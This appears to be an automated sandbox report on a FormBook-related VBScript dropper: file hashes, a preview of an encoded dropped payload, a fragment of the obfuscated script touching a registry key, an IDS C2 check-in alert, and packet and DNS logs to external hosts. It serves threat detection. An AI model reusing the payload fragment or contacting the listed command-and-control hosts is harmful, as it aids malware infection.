              SHA-512:ECD07E601FC9E3CFC39ADDD7BD6F3D7F7FF3253AFB40BF536E9EAAC5A4C243E5EC40FBFD7B216CB0EA29F2517419601E335E33BA19DEA4A46F65E38694D465BF
              Malicious:true
              Preview:...._._.V.a.u.l.t. .R.e.c.o.v.e.r.y.....
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:ASCII text, with very long lines (65536), with no line terminators
              Category:dropped
              Size (bytes):451232
              Entropy (8bit):5.9629342674109695
              Encrypted:false
              SSDEEP:12288:5CDM5hibfyj4pKKjwbXu5x/gdg84YimCt:59hkXpKzbejoX4
              MD5:F4415C58168B8B8D9BFBBF24D36C0D02
              SHA1:4909C7FC652A2781B444D415EC9793272D3D4210
              SHA-256:3F92135F8BD19632FE290BD00ACFB8C13D24CA9C0A2DBE562EF9F34ADEA67DA0
              SHA-512:8DE0BA1427AC8CF552EDF80BC7911C354019E3DDA2D1AA9063FCFBFB22CFC232AB41056D4C8B3DCFB8CEC325263EB5CD6DBD62F1B366CFD67D0F0D458DD93057
              Malicious:false
              Preview:6wLi9nEBm7t8DRQAcQGb6wIHXQNcJATrAs/k6wIEpLledJ9o6wIl9esC45OB8ToM6g5xAZvrAhZkgfFkeHVm6wJ6f3EBm+sCendxAZu6tit5pOsCKLfrAlB9cQGb6wI8ajHK6wLpI+sC0d6JFAvrAqHA6wJ0ndHicQGbcQGbg8EE6wI6hOsCTBGB+USFpAN8yesC/vDrAg2Yi0QkBHEBm3EBm4nD6wL3JusCjy2Bw+wdYwNxAZtxAZu65ILTdusC0gRxAZuB8r9OrJvrAoy+cQGbgepbzH/t6wJcoXEBm3EBm+sCNpJxAZtxAZuLDBDrAqxZ6wKwDokME+sC39/rAmR6QnEBm3EBm4H6/LcEAHXVcQGb6wKLPIlcJAzrAspjcQGbge0AAwAAcQGb6wIlkYtUJAhxAZvrAs8fi3wkBOsCR/rrAqO0ievrAm8Q6wKWYIHDnAAAAOsCB0DrAjYtU+sCYjzrApQVakBxAZtxAZuJ63EBm+sCt17HgwABAAAAoLsD6wKNIXEBm4HDAAEAAOsCg6DrAsKrU+sCivDrAg1sietxAZtxAZuJuwQBAADrAvab6wJvDYHDBAEAAOsCSXXrApxVU+sCPVPrArZxav9xAZvrAj1Ig8IFcQGb6wLYgDH2cQGb6wINWzHJcQGb6wKgzIsa6wK/U3EBm0HrAqEdcQGbORwKdfPrAmVMcQGbRusC2xXrAtPLgHwK+7h13HEBm3EBm4tECvzrArLvcQGbKfBxAZvrAiaP/9JxAZtxAZu6/LcEAHEBm+sCrYwxwOsCmd9xAZuLfCQMcQGbcQGbgTQHw9FlMHEBm3EBm4PABOsCwEnrAh7FOdB15HEBm+sCciKJ++sC7FTrAoNL/9frAsaYcQGbNRKKVkYC7NVCPZ8AFtbk9Dn8sDeWWICJFUc36UIgUARDtOTx7iCtaEIQbVynOwMJABYhPcPtev+/6aSxt9xlWQPEQpmfs6oVQqVoMOgpOaVClWgwQQkc
              File type:ASCII text, with CRLF line terminators
              Entropy (8bit):5.066008589600437
              TrID:
                File name:birectangular.vbs
                File size:423'139 bytes
                MD5:be6f44242b4afd0e61d775b9ef7946b0
                SHA1:80ce71becc7fb1203a43708d7e3fdcad778bb79e
                SHA256:8175ce9634dcd8deb29e81ae2f070d4b2f43ae2b4d154946a251ac93f1e87b59
                SHA512:e1778509074b9aad5fbc7de0947b887816c6f0308b4a347f181eb0dc92008125f7ef1b55184187d7c9cd99a6dfabb82ef858839cefa1185e1016ba0c3d45ba86
                SSDEEP:6144:Ps58yYxqthfv2vF5aa++uQ8YTbBrD0Dz1EhMqcwu+T7wtVuqo41SqW8ZdbU8se0s:GMZcfqHmfRpcLnkd
                TLSH:BA9450E7DAC626188A895AB3DD274B734DA0019D73071F3493BDC69DA18395C82BFBC4
                File Content Preview:........Brevformularermanubri = MidB("Uvulotomy", 108, 54)....Selvmordsstatistikkers &H80000002, "S" + "OFTWARE\Classes\VBSFile"..Private Const Trianon94 = "Krysteren16 phytyl"..Private Const Sanmarineseres = 50561..Private Const Preengage192 = -44050..Pr
                Icon Hash:68d69b8f86ab9a86
                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                07/03/24-07:51:48.424609TCP2031412ET TROJAN FormBook CnC Checkin (GET)4970880192.168.2.746.23.69.44
                TimestampSource PortDest PortSource IPDest IP
                Jul 3, 2024 07:50:20.400886059 CEST49705443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:20.400937080 CEST44349705178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:20.401026011 CEST49705443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:20.406378031 CEST49705443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:20.406393051 CEST44349705178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:20.877935886 CEST44349705178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:20.878029108 CEST49705443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:20.896325111 CEST49705443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:20.896338940 CEST44349705178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:20.896637917 CEST44349705178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:20.903855085 CEST49705443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:20.944530964 CEST44349705178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:21.009665012 CEST44349705178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:21.009697914 CEST44349705178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:21.009757042 CEST49705443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:21.009776115 CEST44349705178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:21.014337063 CEST44349705178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:21.014409065 CEST49705443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:21.014416933 CEST44349705178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:21.062166929 CEST49705443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:21.098273039 CEST44349705178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:21.098285913 CEST44349705178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:21.098367929 CEST49705443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:21.098474026 CEST44349705178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:21.098480940 CEST44349705178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:21.098532915 CEST49705443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:21.099280119 CEST44349705178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:21.099287987 CEST44349705178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:21.099345922 CEST49705443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:21.100209951 CEST44349705178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:21.100272894 CEST49705443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:21.186553001 CEST44349705178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:21.186640024 CEST49705443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:21.186671972 CEST44349705178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:21.186738014 CEST49705443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:21.187591076 CEST44349705178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:21.187659025 CEST49705443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:21.188318968 CEST44349705178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:21.188386917 CEST49705443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:21.188644886 CEST44349705178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:21.188705921 CEST49705443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:21.189332008 CEST44349705178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:21.189400911 CEST49705443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:21.190248966 CEST44349705178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:21.190320015 CEST49705443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:21.190829039 CEST44349705178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:21.190891981 CEST49705443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:21.275315046 CEST44349705178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:21.275408983 CEST49705443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:21.275548935 CEST44349705178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:21.275619030 CEST49705443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:21.275882959 CEST44349705178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:21.275945902 CEST49705443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:21.276513100 CEST44349705178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:21.276576996 CEST49705443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:21.276745081 CEST44349705178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:21.276808023 CEST49705443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:21.277190924 CEST44349705178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:21.277255058 CEST49705443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:21.277391911 CEST44349705178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:21.277447939 CEST49705443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:21.278120041 CEST44349705178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:21.278182983 CEST49705443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:21.278325081 CEST44349705178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:21.278387070 CEST49705443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:21.279045105 CEST44349705178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:21.279103041 CEST49705443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:21.279258013 CEST44349705178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:21.279316902 CEST49705443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:21.280040026 CEST44349705178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:21.280102968 CEST49705443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:21.280204058 CEST44349705178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:21.280262947 CEST49705443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:21.280926943 CEST44349705178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:21.280988932 CEST49705443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:21.363554001 CEST44349705178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:21.363658905 CEST49705443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:21.363753080 CEST44349705178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:21.363822937 CEST49705443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:21.364032984 CEST44349705178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:21.364097118 CEST49705443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:21.364165068 CEST44349705178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:21.364223003 CEST49705443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:21.364429951 CEST44349705178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:21.364496946 CEST49705443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:21.364727020 CEST44349705178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:21.364792109 CEST49705443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:21.365009069 CEST44349705178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:21.365072966 CEST49705443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:21.365269899 CEST44349705178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:21.365331888 CEST49705443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:21.369292021 CEST44349705178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:21.369354963 CEST49705443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:21.369602919 CEST44349705178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:21.369666100 CEST49705443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:21.369915009 CEST44349705178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:21.369985104 CEST49705443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:21.370220900 CEST44349705178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:21.370284081 CEST49705443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:21.370448112 CEST44349705178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:21.370511055 CEST49705443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:21.371454000 CEST44349705178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:21.371516943 CEST49705443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:21.371582031 CEST44349705178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:21.371644974 CEST49705443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:21.405587912 CEST44349705178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:21.405659914 CEST49705443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:21.452212095 CEST44349705178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:21.452429056 CEST44349705178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:21.452445030 CEST49705443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:21.452456951 CEST44349705178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:21.452501059 CEST49705443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:21.452512026 CEST49705443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:21.452769995 CEST44349705178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:21.452841997 CEST49705443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:21.452980995 CEST44349705178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:21.453051090 CEST49705443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:21.453124046 CEST44349705178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:21.453186989 CEST49705443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:21.453413963 CEST44349705178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:21.453483105 CEST49705443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:21.453540087 CEST44349705178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:21.453600883 CEST49705443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:21.453756094 CEST44349705178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:21.453814030 CEST49705443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:21.453953981 CEST44349705178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:21.454014063 CEST49705443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:21.454118967 CEST44349705178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:21.454185009 CEST49705443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:21.454340935 CEST44349705178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:21.454402924 CEST49705443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:21.454499960 CEST44349705178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:21.454550028 CEST44349705178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:21.454560041 CEST49705443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:21.454565048 CEST44349705178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:21.454592943 CEST49705443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:21.454634905 CEST44349705178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:21.454683065 CEST49705443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:21.457206011 CEST49705443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:58.484358072 CEST49707443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:58.484390020 CEST44349707178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:58.484474897 CEST49707443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:58.497644901 CEST49707443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:58.497661114 CEST44349707178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:59.043711901 CEST44349707178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:59.043869972 CEST49707443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:59.107933998 CEST49707443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:59.107955933 CEST44349707178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:59.108213902 CEST44349707178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:59.108287096 CEST49707443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:59.112740040 CEST49707443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:59.160510063 CEST44349707178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:59.217861891 CEST44349707178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:59.217904091 CEST44349707178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:59.218050003 CEST49707443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:59.218067884 CEST44349707178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:59.218199015 CEST49707443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:59.219649076 CEST44349707178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:59.219785929 CEST49707443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:59.305084944 CEST44349707178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:59.305288076 CEST49707443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:59.305958986 CEST44349707178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:59.306134939 CEST49707443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:59.306219101 CEST44349707178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:59.306349039 CEST49707443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:59.307508945 CEST44349707178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:59.307629108 CEST49707443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:59.392615080 CEST44349707178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:59.392801046 CEST49707443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:59.393017054 CEST44349707178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:59.393165112 CEST49707443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:59.393316031 CEST44349707178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:59.393449068 CEST49707443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:59.394066095 CEST44349707178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:59.394192934 CEST49707443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:59.394845009 CEST44349707178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:59.394953012 CEST49707443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:59.395117998 CEST44349707178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:59.395224094 CEST49707443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:59.395823002 CEST44349707178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:59.395952940 CEST49707443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:59.396735907 CEST44349707178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:59.396841049 CEST49707443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:59.481697083 CEST44349707178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:59.481780052 CEST49707443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:59.481997013 CEST44349707178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:59.482078075 CEST49707443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:59.482270956 CEST44349707178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:59.482362032 CEST49707443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:59.482920885 CEST44349707178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:59.483055115 CEST49707443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:59.483246088 CEST44349707178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:59.483346939 CEST49707443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:59.483906031 CEST44349707178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:59.483975887 CEST49707443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:59.484250069 CEST44349707178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:59.484338045 CEST49707443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:59.484770060 CEST44349707178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:59.484886885 CEST49707443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:59.485042095 CEST49707443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:59.485183001 CEST44349707178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:59.485244989 CEST49707443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:59.485399008 CEST44349707178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:59.485460997 CEST49707443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:59.485470057 CEST44349707178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:59.485498905 CEST44349707178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:59.485528946 CEST49707443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:59.485548973 CEST49707443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:59.485622883 CEST49707443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:59.485639095 CEST44349707178.128.157.150192.168.2.7
                Jul 3, 2024 07:50:59.485656977 CEST49707443192.168.2.7178.128.157.150
                Jul 3, 2024 07:50:59.485707998 CEST49707443192.168.2.7178.128.157.150
                Jul 3, 2024 07:51:48.419454098 CEST4970880192.168.2.746.23.69.44
                Jul 3, 2024 07:51:48.424463034 CEST804970846.23.69.44192.168.2.7
                Jul 3, 2024 07:51:48.424556971 CEST4970880192.168.2.746.23.69.44
                Jul 3, 2024 07:51:48.424608946 CEST4970880192.168.2.746.23.69.44
                Jul 3, 2024 07:51:48.429461956 CEST804970846.23.69.44192.168.2.7
                Jul 3, 2024 07:51:48.922415972 CEST4970880192.168.2.746.23.69.44
                Jul 3, 2024 07:51:48.927680969 CEST804970846.23.69.44192.168.2.7
                Jul 3, 2024 07:51:48.927736998 CEST4970880192.168.2.746.23.69.44
                Jul 3, 2024 07:51:50.954134941 CEST4970980192.168.2.746.23.69.44
                Jul 3, 2024 07:51:50.959295988 CEST804970946.23.69.44192.168.2.7
                Jul 3, 2024 07:51:50.959409952 CEST4970980192.168.2.746.23.69.44
                Jul 3, 2024 07:51:50.960834980 CEST4970980192.168.2.746.23.69.44
                Jul 3, 2024 07:51:50.965761900 CEST804970946.23.69.44192.168.2.7
                Jul 3, 2024 07:51:50.965820074 CEST804970946.23.69.44192.168.2.7
                Jul 3, 2024 07:51:50.965827942 CEST804970946.23.69.44192.168.2.7
                Jul 3, 2024 07:51:50.965837002 CEST804970946.23.69.44192.168.2.7
                Jul 3, 2024 07:51:50.965837002 CEST4970980192.168.2.746.23.69.44
                Jul 3, 2024 07:51:50.965876102 CEST4970980192.168.2.746.23.69.44
                Jul 3, 2024 07:51:50.965882063 CEST804970946.23.69.44192.168.2.7
                Jul 3, 2024 07:51:50.965892076 CEST804970946.23.69.44192.168.2.7
                Jul 3, 2024 07:51:50.965893984 CEST4970980192.168.2.746.23.69.44
                Jul 3, 2024 07:51:50.965902090 CEST804970946.23.69.44192.168.2.7
                Jul 3, 2024 07:51:50.965910912 CEST804970946.23.69.44192.168.2.7
                Jul 3, 2024 07:51:50.965925932 CEST804970946.23.69.44192.168.2.7
                Jul 3, 2024 07:51:50.965933084 CEST4970980192.168.2.746.23.69.44
                Jul 3, 2024 07:51:50.965935946 CEST804970946.23.69.44192.168.2.7
                Jul 3, 2024 07:51:50.965964079 CEST4970980192.168.2.746.23.69.44
                Jul 3, 2024 07:51:50.965991974 CEST4970980192.168.2.746.23.69.44
                Jul 3, 2024 07:51:50.970906973 CEST804970946.23.69.44192.168.2.7
                Jul 3, 2024 07:51:50.970916986 CEST804970946.23.69.44192.168.2.7
                Jul 3, 2024 07:51:50.970973015 CEST804970946.23.69.44192.168.2.7
                Jul 3, 2024 07:51:50.970983028 CEST804970946.23.69.44192.168.2.7
                Jul 3, 2024 07:51:50.970989943 CEST4970980192.168.2.746.23.69.44
                Jul 3, 2024 07:51:50.971007109 CEST804970946.23.69.44192.168.2.7
                Jul 3, 2024 07:51:50.971050978 CEST4970980192.168.2.746.23.69.44
                Jul 3, 2024 07:51:50.971084118 CEST804970946.23.69.44192.168.2.7
                Jul 3, 2024 07:51:50.971131086 CEST4970980192.168.2.746.23.69.44
                Jul 3, 2024 07:51:51.015626907 CEST804970946.23.69.44192.168.2.7
                Jul 3, 2024 07:51:51.015783072 CEST4970980192.168.2.746.23.69.44
                Jul 3, 2024 07:51:51.063628912 CEST804970946.23.69.44192.168.2.7
                Jul 3, 2024 07:51:51.063694954 CEST4970980192.168.2.746.23.69.44
                Jul 3, 2024 07:51:51.111722946 CEST804970946.23.69.44192.168.2.7
                Jul 3, 2024 07:51:51.111813068 CEST4970980192.168.2.746.23.69.44
                Jul 3, 2024 07:51:51.163642883 CEST804970946.23.69.44192.168.2.7
                Jul 3, 2024 07:51:51.163734913 CEST4970980192.168.2.746.23.69.44
                Jul 3, 2024 07:51:51.211786032 CEST804970946.23.69.44192.168.2.7
                Jul 3, 2024 07:51:51.211875916 CEST4970980192.168.2.746.23.69.44
                Jul 3, 2024 07:51:51.259762049 CEST804970946.23.69.44192.168.2.7
                Jul 3, 2024 07:51:51.259856939 CEST4970980192.168.2.746.23.69.44
                Jul 3, 2024 07:51:51.308121920 CEST804970946.23.69.44192.168.2.7
                Jul 3, 2024 07:51:51.308214903 CEST4970980192.168.2.746.23.69.44
                Jul 3, 2024 07:51:51.355746031 CEST804970946.23.69.44192.168.2.7
                Jul 3, 2024 07:51:51.355897903 CEST4970980192.168.2.746.23.69.44
                Jul 3, 2024 07:51:51.407902002 CEST804970946.23.69.44192.168.2.7
                Jul 3, 2024 07:51:51.407985926 CEST4970980192.168.2.746.23.69.44
                Jul 3, 2024 07:51:51.425487041 CEST804970946.23.69.44192.168.2.7
                Jul 3, 2024 07:51:51.425657034 CEST4970980192.168.2.746.23.69.44
                Jul 3, 2024 07:51:51.430767059 CEST804970946.23.69.44192.168.2.7
                Jul 3, 2024 07:51:51.430778980 CEST804970946.23.69.44192.168.2.7
                Jul 3, 2024 07:51:51.430804014 CEST804970946.23.69.44192.168.2.7
                Jul 3, 2024 07:51:51.430814028 CEST804970946.23.69.44192.168.2.7
                Jul 3, 2024 07:51:51.430883884 CEST804970946.23.69.44192.168.2.7
                Jul 3, 2024 07:51:51.430902004 CEST804970946.23.69.44192.168.2.7
                Jul 3, 2024 07:51:51.431005955 CEST804970946.23.69.44192.168.2.7
                Jul 3, 2024 07:51:51.431024075 CEST804970946.23.69.44192.168.2.7
                Jul 3, 2024 07:51:51.431118011 CEST804970946.23.69.44192.168.2.7
                Jul 3, 2024 07:51:51.431128025 CEST804970946.23.69.44192.168.2.7
                Jul 3, 2024 07:51:51.431168079 CEST804970946.23.69.44192.168.2.7
                Jul 3, 2024 07:51:51.431176901 CEST804970946.23.69.44192.168.2.7
                Jul 3, 2024 07:51:51.431325912 CEST804970946.23.69.44192.168.2.7
                Jul 3, 2024 07:51:51.431363106 CEST804970946.23.69.44192.168.2.7
                Jul 3, 2024 07:51:51.431497097 CEST804970946.23.69.44192.168.2.7
                Jul 3, 2024 07:51:51.431577921 CEST804970946.23.69.44192.168.2.7
                Jul 3, 2024 07:51:51.431631088 CEST804970946.23.69.44192.168.2.7
                Jul 3, 2024 07:51:51.431847095 CEST804970946.23.69.44192.168.2.7
                Jul 3, 2024 07:51:51.431894064 CEST804970946.23.69.44192.168.2.7
                Jul 3, 2024 07:51:51.432017088 CEST804970946.23.69.44192.168.2.7
                Jul 3, 2024 07:51:51.432060957 CEST804970946.23.69.44192.168.2.7
                Jul 3, 2024 07:51:51.432106972 CEST804970946.23.69.44192.168.2.7
                Jul 3, 2024 07:51:51.432344913 CEST804970946.23.69.44192.168.2.7
                Jul 3, 2024 07:51:51.432400942 CEST804970946.23.69.44192.168.2.7
                Jul 3, 2024 07:51:51.432410955 CEST804970946.23.69.44192.168.2.7
                Jul 3, 2024 07:51:51.432658911 CEST804970946.23.69.44192.168.2.7
                Jul 3, 2024 07:51:51.432715893 CEST4970980192.168.2.746.23.69.44
                TimestampSource PortDest PortSource IPDest IP
                Jul 3, 2024 07:50:20.366451025 CEST5952053192.168.2.71.1.1.1
                Jul 3, 2024 07:50:20.396856070 CEST53595201.1.1.1192.168.2.7
                Jul 3, 2024 07:51:48.361525059 CEST6375153192.168.2.71.1.1.1
                Jul 3, 2024 07:51:48.418807030 CEST53637511.1.1.1192.168.2.7
                Jul 3, 2024 07:52:12.047447920 CEST6396553192.168.2.71.1.1.1
                Jul 3, 2024 07:52:12.712184906 CEST53639651.1.1.1192.168.2.7
                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                Jul 3, 2024 07:50:20.366451025 CEST192.168.2.71.1.1.10x548dStandard query (0)larryfrank.cpaA (IP address)IN (0x0001)false
